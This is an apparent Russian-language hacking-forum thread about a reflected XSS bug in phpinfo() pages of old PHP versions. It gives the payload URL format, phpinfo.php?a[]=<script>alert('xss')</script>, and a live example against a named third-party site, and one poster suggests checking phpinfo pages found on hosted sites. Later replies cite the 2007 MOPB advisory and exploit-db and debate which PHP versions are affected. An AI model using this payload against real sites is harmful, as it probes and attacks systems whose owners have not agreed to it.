Xss в phpinfo().

Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.

Формат уязвимой ссылки:

Code:

httр://site.com/phpinfo.php?a[]=<script>alert('xss')<script>

Пример:

Code:

http://www.infineform.com/info.php?a[]=<script>alert('xss')</script>

 

Я на хостинге сайтов находил phpinfo надо проверить на XSS )

 

Это старая бага:
http://www.php-security.org/MOPB/MOPB-08-2007.html
http://www.exploit-db.com/exploits/3405/

На том сайте что ты скинул для примера

Code:

Build Date 	Sep 28 2005 12:31:10

Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.

Короче будет работать только на очень старых версиях PHP.

 

В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.

 

Мда.Какая глобальная и "новая" уязвимость.

 

Я нигде не писал что уязвимость новая и что я её лично нашёл.
Не все же знали про эту уязвимость и на форуме не было упоминания её.
Кому надо взяли на заметку.